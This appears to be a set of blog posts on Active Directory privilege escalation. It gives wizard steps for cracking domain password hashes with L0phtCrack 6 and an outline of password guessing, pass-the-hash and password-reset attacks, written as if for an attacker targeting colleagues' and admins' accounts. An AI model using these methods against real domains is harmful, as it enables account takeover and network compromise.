Active Directory Security Privilege Escalation Using L0phtCrack 6

Здравствуйте!

In this post, we will look at the first way to escalate privilege in Active Directory, which is the most difficult way launch an Active Directory Security Privilege Escalation attack.

This way involves guessing the target user’s password, or cracking the target user’s password (; cracking refers to the process of recovering a user’s password that has been stored in or transmitted by a computer.)

Since most Active Directory deployments use basic security protections like Account Lockout, only amateurs use password guessing as a means to obtain an domain user account’s password. Also, because most AD deployments also have basic auditing in place, amateurs using password guessing are very likely to get caught in the act.

So, since password guessing is virtually not a realistic option in a decently protected Active Directory (and because its for amateurs) I will bypass it and talk about more interesting password cracking approach to get to a domain user account’s password.

The main tool used for password cracking is a tool called L0phtCrack, now in version 6. L0PhtCrack is primarily a password cracking tool and has five main ways in which it cracks passwords –

1. UserName Crack - L0phtCrack 6 checks to see if any accounts have used the username as a password. This crack is performed in every audit.
2. Dictionary Crack – L0phtCrack 6 tests all the words in a specified dictionary file against the password hashes. The dictionary crack tries words up to the 14 character length limit.
3. Hybrid Crack – L0phtCrack will modify existing dictionary words to generate additional password attempts, based on dictionary words slightly modified with additional numbers and symbols.
4. Precomputed Crack – L0phtcrack will compare user password hashes with pre-computed password hashes specified in a hash-file.
5. Brute Force Crack - L0phtcrack will attempt every combination of characters it is configured to use to attempt brute-forcing of password.

Using L0phtCrack for Active Directory Security Privilege Escalation

Now for launching a Active Directory Security Privilege Escalation attack, L0phtCrack 6 can be used to get the clear-text password of any domain user account, such as those of Domain/Enterprise Admins, and once you know their passwords, you can login as them and by doing so you escalated your privilege in Active Directory.

But did you really escalate privilege? Or did you just show that you don't know much about Windows Security?

Here’s what I mean - To use L0phtCrack 6 to crack domain user account passwords, you need administrative privileges on a Domain Controller (DC), but if you already have administrative privileges on a DC, you are already are a God-like administrator, but if you don’t already know that, you don’t know much about Windows Security.

Note: L0phtCrack6 has a new capability called Remote Password Retrieval, but if you read the documentation, it clearly states that a) you need Administrator Privileges on the remote Domain Controller, specifically the Debug Privilege, and b) the machine also needs to be able to be remotely administered.

Anyway, many default builtin groups in Active Directory, such as Server Operators, Backup Operators and Print Operators already have administrative privileges on Domain Controllers, so technically any member of any of these groups could use L0phtCrack to obtain access to hashes and then get to clear-text passwords.

But like I mentioned earlier, members of these groups already has enough power to be a Domain Admin, but if they don’t know that, it is their ignorance, and there’s no greater risk than having ignorant administrators who possess God-like privileges.

However, if someone who has managed to get administrative access on a Domain Controller, but has no idea that they now already have God-like Power or have no idea how to use it, then L0phtCrack can certainly help them find out the password of a Domain Admin, so they can then login as a Domain Admin.

So, if you can manage to get administrative access on a Domain Controller, and have no idea that you already have God-like powers, here is how to use L0phtCrack 6 to escalate your privilege in Active Directory –

How to Escalate Privilege in Active Directory by Using L0phtCrack

Step 1- Configure L0phtCrack Session Options

You should first specify the set of Session Options for L0phtCrack 6 to use.

I highly recommend referring to the product manual for the details, as it can impact how long the cracking process will take and what resources it will use.

Step 2 – Obtaining a copy of the Password Hashes from Active Directory

1. Launch the L0phtCrack Wizard

2. If you are logged in on a DC, select Retrieve from the Local Machine, otherwise select Retrieve from a Remote Machine

3. Choose an auditing method. Select from amongst – Quick Password Audit, Common Password Audit, Strong Password Audit, or Custom

4. Pick a Reporting Style. Options include Display passwords when audited, Display encrypted password ‘hashes’, Display how long it took to audit each password, Display auditing method, and Make Visible Notification when auditing is done.

Step 3 – Cracking Active Directory Domain User Account Password Hashes

1. Click on Finish to begin cracking Active Directory Domain User Account Password Hashes

That is all you need to so. Once L0phtCrack6 has done its job, if everything goes fine, you should be able to see the password(s) of one or more Domain Admins in your Active Directory.

Once you know the password of a Domain Admin account, you can use it to login as the Domain Admin. Once logged in as a Domain Admin, what you do with that power is limited only by your expertise. (Some of our comrades can bring entire network down in minutes.)

There are other password cracking tools available as well such as John the Ripper, pwdump7 and others, but they all require administrative privileges to begin with, so they cannot strictly be used to elevate security privileges in Active Directory or Windows.


L0phtCrack Download, Trial and Additional Info

For additional info and to download free L0phtCrack 6 trial, click here.

In the next post, we’ll see how to use a real way to Escalate privilege in Active Directory via the use of Password Hashes.

Спасибо

3 Primary Ways to Escalate Privilege in Active Directory

Здравствуйте!

In this post, we will look at 3 primary ways to escalate privilege in the Active Directory. (In posts to follow, I will cover each of these in detail.)

Before you begin to escalate privilege, you identify the target of your Active Directory security privilege escalation attack i.e. identify the Active Directory (domain) user account whose identity you wish to compromise.

The objective of the security privilege escalation attack is to elevate your privilege from that of your account to that of another account, and one that usually has more powers (elevated powers) than yours. This domain user account can be that of a colleague, a delegated Active Directory administrator (e.g. a Help Desk Analyst) or a Domain/Enterprise Administrator.

To accomplish this, the primary method of attack is to steal the identity of the target domain user account. In other words, the 3 primary ways to escalate privilege in the Active Directory involving stealing a corporate user’s identity, as their domain user account is basically their identity.

So, the 3 ways to escalate privilege in Active Directory are –

1. Guessing the target user’s password, then logging in using the password
2. Obtaining and then passing the user’s hash to impersonate the user
3. Resetting the user’s password, then logging in with new password

The 3 ways mentioned above are in the decreasing order of effort required.

So the hardest way is to guess a target user’s password, and the easiest way is to reset the target user’s password, even though tools (l0phtcrack) make the actually guessing effort easy.

The second way, falls in between, because it requires less time than the guessing passwords, but requires access to a machine on which the target user may have logged on, but once you have access to such a machine there are now tools available (lslsass64.exe) that can help you find user’s hashes and then use them (runhash64.exe).

The ability to reset a user’s password is the easiest but also the least known / least used method, because the hardest part in this approach is not actually resetting the password, but trying to find out who can reset the target user’s account’s password.

Trying to find out who can reset the password of a domain user account is generally a very difficult task, and it is this level of difficulty that has been a deterrent in the use of this attack vector, but these days, just like there is at least one tool to help brute-force passwords (l0phtcrack), there is also a tool to easily find out who can reset whose passwords in an Active Directory environment. The availability of such a tool now makes it very easy for anyone to try and find out who can reset whose passwords, and use this information to reset a target user’s password, then log in as the target user, in effect successfully escalating privilege in Active Directory.

In the next 3 posts, we will see in detail how to use each of these three methods to escalate privilege in Active Directory, with analysis on how much effort each approach involves, what tools are required and other helpful details.

Спасибо

Государственный гимн Российской Федерации

Здравствуйте!

Today, as Americans celebrate July 04, I too feel proud of my country, so I thought I will share our great national anthem (with translation) with you.



More on Security Privilege Escalation in Active Directory in next post.

Спасибо